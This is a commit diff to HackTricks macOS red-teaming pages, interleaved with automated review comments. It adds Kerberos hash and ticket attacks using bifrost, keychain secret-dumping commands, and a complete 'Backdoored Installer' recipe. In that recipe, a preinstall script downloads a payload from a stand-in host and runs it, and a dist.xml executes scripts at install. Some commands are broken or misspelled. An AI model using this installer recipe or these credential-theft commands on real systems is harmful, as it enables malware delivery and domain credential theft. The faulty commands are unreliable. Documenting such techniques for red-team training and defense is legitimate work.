mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-14 08:57:55 +00:00
GITBOOK-4389: No subject
This commit is contained in:
parent
1eac4cf2cc
commit
693e02600d
3 changed files with 127 additions and 14 deletions
@ -1,8 +1,8 @@
# macOS Red Teaming
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
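Review bot: the banner image paths in this hunk move from the root-absolute `/.gitbook/assets/arte.png` and `/.gitbook/assets/grte.png` to the relative `../../.gitbook/assets/...`; the relative form only resolves if this page lives exactly two directories below the repository root, so the depth should be verified against the file's real location before merge (the "macOS Installers Abuse" hunk further down uses `../../../`, three levels, for the same banner). The two `<img>` tags per line still carry an empty `alt`, unchanged from before.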
@ -194,9 +194,50 @@ dsconfigad -show
More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/)
### Computer$ password
Get passwords using:
```bash
bifrost --action askhash --username [name] --password [password] --domain [domain]
```
It's possible to access the **`Computer$`** password inside the System keychain.
### Over-Pass-The-Hash
Get a TGT for an specific user and service:
```bash
bifrost --action asktgt --username [user] --domain [domain.com] \
--hash [hash] --enctype [enctype] --keytab [/path/to/keytab]
```
Once the TGT is gathered, it's possible to inject it in the current session with:
```bash
bifrost --action asktgt --username test_lab_admin \
--hash CF59D3256B62EE655F6430B0F80701EE05A0885B8B52E9C2480154AFA62E78 \
--enctype aes256 --domain test.lab.local
```
### Kerberoasting
```bash
bifrost --action asktgs --spn [service] --domain [domain.com] \
--username [user] --hash [hash] --enctype [enctype]
```
With obtained service tickets it's possible to try to access shares in other computers:
```bash
smbutil view //computer.fqdn
mount -t smbfs //server/folder /local/mount/point
```
## Accessing the Keychain
The Keychain highly probably contains sensitive information that if accessed withuot generating a prompt could help to move forward a red team exercise:
The Keychain highly probably contains sensitive information that if accessed without generating a prompt could help to move forward a red team exercise:
{% content-ref url="macos-keychain.md" %}
[macos-keychain.md](macos-keychain.md)
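Review bot: the prose and the second code block under "Over-Pass-The-Hash" do not match: the sentence says the TGT is "injected in the current session", but the command that follows is another `bifrost --action asktgt` request, identical in kind to the first block, so either the sentence or the command should change to describe the same step. The sample value on the `--hash` line is 62 hex digits, whereas an AES256 key is 32 bytes (64 hex digits); since `--enctype aes256` is passed, the sample should be fixed to a valid length or marked as a placeholder. Minor grammar in the same hunk: "Get a TGT for an specific user" should read "a specific user", and the "Kerberoasting" heading has a command block but no sentence saying what it does or what the returned ticket is used for, unlike the neighbouring sections.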
@ -223,8 +264,8 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati
* [**OBTS v3.0: "An Attackers Perspective on Jamf Configurations" - Luke Roberts / Calum Hall**](https://www.youtube.com/watch?v=ju1IYWUv4ZA)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -1,8 +1,8 @@
# macOS Keychain
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -83,6 +83,9 @@ When an **application creates an entry in the keychain**, the rules are slightly
### `security`
```bash
# List keychains
security list-keychains
# Dump all metadata and decrypted secrets (a lot of pop-ups)
security dump-keychain -a -d
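Review bot: the new comment on `security dump-keychain -a -d` is correct but would be more useful if it said why the pop-ups appear: `-d` asks the keychain to decrypt every item, and each item whose access control list does not already trust the `security` binary raises an authorization dialog, so a full dump produces one prompt (and one authorization event) per secret. That is exactly the noisy behaviour the red-teaming page's "without generating a prompt" sentence is warning about, and it is also what a defender can look for, so one clause here ties the two pages together.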
@ -91,6 +94,9 @@ security find-generic-password -a "Slack" -g
# Change the specified entrys PartitionID entry
security set-generic-password-parition-list -s "test service" -a "test acount" -S
# Dump specifically the user keychain
security dump-keychain ~/Library/Keychains/login.keychain-db
```
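Review bot: the `security set-generic-password-parition-list` line will not run as written. The subcommand is misspelled (the real name is `set-generic-password-partition-list`) and `-S` takes the partition list as an argument, so the command needs a value after it; the comment above it reads "entrys" for "entry's", and the sample account `"test acount"` should be `"test account"`. Please fix the spelling and supply (or clearly placeholder) the `-S` value before merge, otherwise readers will copy a command that fails on the typo alone.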
### APIs
@ -162,8 +168,8 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -1,8 +1,8 @@
# macOS Installers Abuse
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
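Review bot: this file's banner uses a three-level relative prefix, `../../../.gitbook/assets/...`, while the "macOS Red Teaming" and "macOS Keychain" hunks in the same commit use two levels, `../../`. That is consistent only if this page sits one directory deeper than the other two; worth confirming the depth for all three files rather than relying on the rendered preview, since a wrong depth just shows a broken image with an empty `alt`.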
@ -97,7 +97,7 @@ An example of this is **CVE-2021-26089** which managed to **overwrite a periodic
### Empty Payload
It's possible to just generate a **`.pkg`** file with **pre and post-install scripts** without any payload.
It's possible to just generate a **`.pkg`** file with **pre and post-install scripts** without any real payload apart from the malware inside the scripts.
### JS in Distribution xml
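Review bot: the reworded sentence under "Empty Payload" now reads "without any real payload apart from the malware inside the scripts", which uses "payload" in two senses in one clause and sounds self-contradictory. Suggest stating the point directly, e.g. "without any payload files at all: the pre- and post-install scripts are the only content the package carries", which is also the detection-relevant fact (a `.pkg` whose payload is empty but which ships scripts is itself a signal worth flagging).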
@ -105,15 +105,81 @@ It's possible to add **`<script>`** tags in the **distribution xml** file of the
<figure><img src="../../../.gitbook/assets/image (1043).png" alt=""><figcaption></figcaption></figure>
### Backdoored Installer
Malicious installer using a script and JS code inside dist.xml
```bash
# Package structure
mkdir -p pkgroot/root/Applications/MyApp
mkdir -p pkgroot/scripts
# Create preinstall scripts
cat > pkgroot/scripts/preinstall <<EOF
#!/bin/bash
echo "Running preinstall script"
curl -o /tmp/payload.sh http://malicious.site/payload.sh
chmod +x /tmp/payload.sh
/tmp/payload.sh
exit 0
EOF
# Build package
pkgbuild --root pkgroot/root --scripts pkgroot/scripts --identifier com.malicious.myapp --version 1.0 myapp.pkg
# Generate the malicious dist.xml
cat > ./dist.xml <<EOF
<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="1">
<title>Malicious Installer</title>
<options customize="allow" require-scripts="false"/>
<script>
<![CDATA[
function installationCheck() {
if (system.isSandboxed()) {
my.result.title = "Cannot install in a sandbox.";
my.result.message = "Please run this installer outside of a sandbox.";
return false;
}
return true;
}
function volumeCheck() {
return true;
}
function preflight() {
system.run("/path/to/preinstall");
}
function postflight() {
system.run("/path/to/postinstall");
}
]]>
</script>
<choices-outline>
<line choice="default">
<line choice="myapp"/>
</line>
</choices-outline>
<choice id="myapp" title="MyApp">
<pkg-ref id="com.malicious.myapp"/>
</choice>
<pkg-ref id="com.malicious.myapp" installKBytes="0" auth="root">#myapp.pkg</pkg-ref>
</installer-gui-script>
EOF
# Buil final
productbuild --distribution dist.xml --package-path myapp.pkg final-installer.pkg
```
## References
* [**DEF CON 27 - Unpacking Pkgs A Look Inside Macos Installer Packages And Common Security Flaws**](https://www.youtube.com/watch?v=iASSG0\_zobQ)
* [**OBTS v4.0: "The Wild World of macOS Installers" - Tony Lambert**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
* [**DEF CON 27 - Unpacking Pkgs A Look Inside MacOS Installer Packages**](https://www.youtube.com/watch?v=kCXhIYtODBg)
* [https://redteamrecipe.com/macos-red-teaming?utm\_source=pocket\_shared#heading-exploiting-installer-packages](https://redteamrecipe.com/macos-red-teaming?utm\_source=pocket\_shared#heading-exploiting-installer-packages)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
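Review bot: several points in the "Backdoored Installer" block. The comment `# Buil final` should read `# Build final installer`. Both heredocs use an unquoted `EOF` delimiter, so any `$`, backtick or `\` in the embedded script or XML would be expanded by the generating shell rather than written verbatim; nothing in the current content trips this, but `<<'EOF'` is the safe form for files meant to be copied literally. `http://malicious.site/payload.sh`, `com.malicious.myapp` and `/path/to/preinstall` / `/path/to/postinstall` are placeholders and the text should say so, otherwise readers take them for real values (the JS paths also differ from the `pkgroot/scripts/` directory the package is actually built from, which is confusing as written). Finally, the section title promises "a script and JS code inside dist.xml" but never says what a reviewer or analyst should take from the example; one sentence noting that a `<script>` block in the Distribution file and a preinstall script that fetches and executes a file in `/tmp` over plain HTTP are the artifacts to inspect and alert on would turn the recipe into something useful for the defensive reader as well. The two DEF CON 27 references at the end of the file carry near-identical titles with different URLs and should be checked for a duplicate.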